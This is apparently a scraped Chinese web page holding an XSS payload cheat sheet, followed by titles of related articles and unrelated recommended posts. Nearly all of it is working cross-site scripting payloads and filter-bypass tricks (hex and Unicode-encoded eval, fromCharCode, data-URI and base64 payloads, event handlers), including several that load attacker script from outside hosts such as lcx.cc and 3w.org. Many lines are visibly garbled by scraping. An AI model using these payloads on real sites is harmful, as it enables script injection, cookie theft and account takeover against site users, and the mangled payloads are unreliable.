【XSS基本探测pyload】

 
  1. <script>alert(“xss”)</script>
  2. <script>alert(/xss/)</script> //双引号换成斜杠
  3. <script>alert(‘xss’)</script> //用单引号
  4. <script>alert("xss");</script> //用分号
  5. <script>alert('xss');</script>
  6. <script>alert(/xss/);</script>
  7. <script>alert("jdq") //自动补全
  8.  
  9. <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //用分号
  10. <script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //空格+分号
  11.  
  12. <script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //换行符
  13.  
  14. <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  15. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //回车
  1. 单引号被过滤
  2. <script>alert(/jdq/)</script> //用双引号会把引号内的内容单独作为内容 用斜杠,则会连斜杠一起回显
  1. javascript伪协议】回旋
  2. <a href="javascript:alert(/test/)">xss</a>
  1. <script>被过滤↓
  2. <iframe src=javascript:alert( width= /><iframe>利用iframe框架标签
  1. alert被过滤
  2. <img src=" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
  1. img标记】
  2. <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
 
  1. on事件点击触发
  2. onclick="alert('xss') //注意要用单引号 双引号不会触发
  1. on事件-移动触发
  2. Onmousemove="alert('xss')
 
  1. 【利用函数加密】
  2. eval 函数配合编码
  3. <script>eval(“js+16进制加密”)</script>
  4.  
  5. <script>eval("\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73\x22\x29")</script>
  6. 编码要执行的语句↓
  7. Alert(“xss”)
  1. unicode加密】
  2. <script>eval("unicode加密")</script>
  3. //js unicode加密 解决alert()被过滤
  4. <script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
  5. 格式↓
  6. 标记eval(“编码”) 结束标记
  1. String.fromCharCod函数】
  2. String.fromCharCode需要配合eval来实现,
  3. 构造
  4. <script>eval(String.fromCharCode(,,,,,,,,,,,,))</script>
  5. eval内容加引号相当于正常js语句来执行
  6. 不加引号,则是默认作为eval的其他参数语句来执
  7. 固定格式→<script>eval(String.fromCharCode编码内容))</script>
  1. data协议运用】
  2. <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUnE5bjZ6dT48L3NjcmlwdD4="></object>
  3. 格式
  4. Data:[<mime type>][;charset=<charset>[;base64],<encoded data>
  5. Data //协议
  6. <mime type> //数据类似
  7. charset=<charset> //指定编码
  8. [;base64] //被指定的编码
  9. <encoded data> //定义data协议的编码
  10. 实际编码↓
  11. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>
  12. base64编码要执行的内容
  13. 特点:不支持IE

【各标签实战pyload】
——————————————————-xss其他标签下的js用法总结大全––——————————–————————————

  1. <img src=javascript:document.write('<scr'+'ipt src=\'http://www.baidu.com/1.txt\'></scr'+'ipt>')></img> //仅支持IE6
  2.  
  3. <img src=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img> //仅支持IE6
  4.  
  5. <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss
  6.  
  7. <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss
  8.  
  9. <img src=x onerror=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com">
  10.  
  11. <input autofocus="bbbb" />
  12.  
  13. <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></object>
  14.  
  15. <iframe width="0px" height="0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></iframe> ie不支持
  16.  
  17. <a href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5wb29qeC5jb20vMS5qcz48L3NjcmlwdD4=">sb</a>
  18.  
  19. <anchor><img>(不执行js) <a>(需点击) <meta>.....
  20.  
  21. <anchor onload=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com">
  22.  
  23. <svg onload=document.body.appendChild(document.CReateElement("scr"+"ipt")).src="http://www.baidu.com">
  24.  
  25. <svg onload=document.write(String.fromCharCode(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,))>
  26.  
  27. <baa id=>
  28.  
  29. ()普通的XSS JavaScript注入
  30. <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  31.  
  32. ()IMG标签XSS使用JavaScript命令
  33. <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  34.  
  35. ()IMG标签无分号无引号
  36. <IMG SRC=javascript:alert(‘XSS’)>
  37.  
  38. ()IMG标签大小写不敏感
  39. <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  40.  
  41. ()HTML编码(必须有分号)
  42. <IMG SRC=javascript:alert(“XSS”)>
  43.  
  44. ()修正缺陷IMG标签
  45. <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
  46.  
  47. ()formCharCode标签
  48. <IMG SRC=javascript:alert(String.fromCharCode(,,))>
  49.  
  50. ()UTF-8的Unicode编码
  51. <IMG SRC=jav..省略..S')>
  52.  
  53. ()7位的UTF-8的Unicode编码是没有分号的
  54. <IMG SRC=jav..省略..S')>
  55.  
  56. ()十六进制编码也是没有分号
  57. <IMG SRC=\'#\'" /span>
  58.  
  59. ()嵌入式标签,将Javascript分开
  60. <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  61.  
  62. ()嵌入式编码标签,将Javascript分开
  63. <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  64.  
  65. ()嵌入式换行符
  66. <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  67.  
  68. ()嵌入式回车
  69. <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  70.  
  71. ()嵌入式多行注入JavaScript,这是XSS极端的例子
  72. <IMG SRC=\'#\'" /span>
  73.  
  74. ()解决限制字符(要求同页面)
  75. <script>z=’document.’</script>
  76. <script>z=z+’write(“‘</script>
  77. <script>z=z+’<script</script>
  78. <script>z=z+’ src=ht</script>
  79. <script>z=z+’tp://ww’</script>
  80. <script>z=z+’w.shell</script>
  81. <script>z=z+’.net/.’</script>
  82. <script>z=z+’js></sc</script>
  83. <script>z=z+’ript>”)’</script>
  84. <script>eval_r(z)</script>
  85.  
  86. ()空字符
  87. perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
  88.  
  89. ()空字符2,空字符在国内基本没效果.因为没有地方可以利用
  90. perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  91.  
  92. ()Spaces和meta前的IMG标签
  93. <IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
  94.  
  95. ()Non-alpha-non-digit XSS
  96. <SCRIPT/XSS SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT>
  97.  
  98. ()Non-alpha-non-digit XSS to
  99. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  100.  
  101. ()Non-alpha-non-digit XSS to
  102. <SCRIPT/SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT>
  103.  
  104. ()双开括号
  105. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  106.  
  107. ()无结束脚本标记(仅火狐等浏览器)
  108. <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
  109.  
  110. ()无结束脚本标记2
  111. <SCRIPT SRC=//3w.org/XSS/xss.js>
  112.  
  113. ()半开的HTML/JavaScript XSS
  114. <IMG SRC=\'#\'" /span>
  115.  
  116. ()双开角括号
  117. <iframe src=http://3w.org/XSS.html <
  118.  
  119. ()无单引号 双引号 分号
  120. <SCRIPT>a=/XSS/
  121. alert(a.source)</SCRIPT>
  122.  
  123. ()换码过滤的JavaScript
  124. \”;alert(‘XSS’);//
  125.  
  126. ()结束Title标签
  127. </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  128.  
  129. ()Input Image
  130. <INPUT SRC=\'#\'" /span>
  131.  
  132. ()BODY Image
  133. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  134.  
  135. ()BODY标签
  136. <BODY(‘XSS’)>
  137.  
  138. ()IMG Dynsrc
  139. <IMG DYNSRC=\'#\'" /span>
  140.  
  141. ()IMG Lowsrc
  142. <IMG LOWSRC=\'#\'" /span>
  143.  
  144. ()BGSOUND
  145. <BGSOUND SRC=\'#\'" /span>
  146.  
  147. ()STYLE sheet
  148. <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
  149.  
  150. ()远程样式表
  151. <LINK REL=”stylesheet” HREF=”[url=http://3w.org/xss.css]http://3w.org/xss.css[/url]”>
  152.  
  153. ()List-style-image(列表式)
  154. <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
  155.  
  156. ()IMG VBscript
  157. <IMG SRC=\'#\'" /STYLE><UL><LI>XSS
  158.  
  159. ()META链接url
  160. <META HTTP-EQUIV=”refresh” CONTENT=”; URL=http://;URL=javascript:alert(‘XSS’);”>
  161.  
  162. ()Iframe
  163. <IFRAME SRC=\'#\'" /IFRAME>
  164.  
  165. ()Frame
  166. <FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
  167.  
  168. ()Table
  169. <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
  170.  
  171. ()TD
  172. <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
  173.  
  174. ()DIV background-image
  175. <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  176.  
  177. ()DIV background-image后加上额外字符(-&&&&-&&&)
  178. <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  179.  
  180. ()DIV expression
  181. <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  182.  
  183. ()STYLE属性分拆表达
  184. <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
  185.  
  186. ()匿名STYLE(组成:开角号和一个字母开头)
  187. <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
  188.  
  189. ()STYLE background-image
  190. <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
  191.  
  192. ()IMG STYLE方式
  193. exppression(alert(“XSS”))’>
  194.  
  195. ()STYLE background
  196. <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  197.  
  198. ()BASE
  199. <BASE HREF=”javascript:alert(‘XSS’);//”>
  200.  
  201. ()EMBED标签,你可以嵌入FLASH,其中包涵XSS
  202. <EMBED SRC=\'#\'" /span>[flash]http://3w.org/XSS/xss.swf[/flash]” ></EMBED>
 

Web安全--XSS模版的更多相关文章

  1. Web安全XSS

    Web安全XSS 简单的反射型XSS钓鱼演示 </form> <script> function hack(){ XSSImage=new Image; XSSImage.sr ...

  2. web安全-xss攻击

    web安全问题 xss攻击 1.html标签 html内容的转义 escapeHtml str = str.replace(/&/g,'&amp'); str = str.replac ...

  3. web 安全 & web 攻防: XSS(跨站脚本攻击)和 CSRF(跨站请求伪造)

    web 安全 & web 攻防: XSS(跨站脚本攻击)和 CSRF(跨站请求伪造) XSS(跨站脚本攻击)和CSRF(跨站请求伪造) Cross-site Scripting (XSS) h ...

  4. WEB安全----XSS和CSRF

    随着Web2.0.社交网络.微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵 ...

  5. Web安全--XSS现代WAF规则探测及绕过技术

    XSS现代WAF规则探测及绕过技术初始测试 1.使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过 ...

  6. MVC WEB安全——XSS攻击防御

    XSS(跨站脚本攻击) 描述: 原理:攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的代码会被执行,从而达到攻击用户的特殊目的. 类别: 1)被动注入(Passive Inj ...

  7. 小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF

    存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留 ...

  8. 小白日记47:kali渗透测试之Web渗透-XSS(一)

    XSS [推荐书籍:XSS跨站脚本攻击剖析与防御] xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/ ...

  9. web安全-XSS攻击及防御

    XSS攻击的原理 xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻 ...

随机推荐

  1. MVC控制器向View视图传值的三种方法

    首先创建一个MVC的项目,其中需要一个控制器(TestController),三个视图(index,edit,detail) 1.项目结构如下:

  2. 批量导数据之利器-load data[2016-07-11]

    由于天热,中午吃完饭后不再去逛了,感觉这段时间其实也是可以利用起来的,所以决定每天中午积累一些小的知识点.今天中午,先总结一下最近造数据用到手命令,load data. 使用这个命令的起源是因为最近要 ...

  3. Durandal介绍

         Durandal是一个JS框架用于构建客户端single page application(SPAs).它支持MVC,MVP与MVVM前端构架模式.使用RequireJS做为其基本约定层,D ...

  4. tomcat学习笔记一:安装和配置

    安装 配置环境: win7 + centos7虚拟机 安装步骤: 到http://tomcat.apache.org/下载最新的tomcat安装包(8.0.24) 移到对应的目录并解压 安装问题: 安 ...

  5. C#进制转换

    //十进制转二进制 Console.WriteLine(Convert.ToString(69, 2)); //十进制转八进制 Console.WriteLine(Convert.ToString(6 ...

  6. ABAP:SAP报表性能的优化

    大部分ABAPer都是从SAP报表及打印开始学起的,大家也都认为写个SAP报表程序是最简单不过的事了. 但是实际情况真的如此吗?写报表时除了保证数据的准确性,您可曾考虑过报表的性能问题吗? 由于报表程 ...

  7. Installation failed with message INSTALL_FAILED_UID_CHANGED.--APK安装失败解决方法

    出现此错误原因大都为:手机上原来APK存在残留,即没有卸载干净,导致不能安装新的APK 解决办法: 1.手机上手动卸载出现问题的APP,再重新安装 2.如果apk无法卸载,则将apk相关文件和相关内容 ...

  8. CollectionView 简用

    创建一个CollectionView 分为几个步骤 1.先创建布局FlowLayout 设置布局格式 2.创建CollectionView 并使用布局Flowlayout  -initWithFram ...

  9. 记录JVM垃圾回收算法

    垃圾回收算法可以分为三类,都基于标记-清除(复制)算法: Serial算法(单线程) 并行算法 并发算法 JVM会根据机器的硬件配置对每个内存代选择适合的回收算法,比如,如果机器多于1个核,会对年轻代 ...

  10. Entity Framework 异常档案

    1.异常 The model backing the 'DBContext' context has changed since the database was created.Consider u ...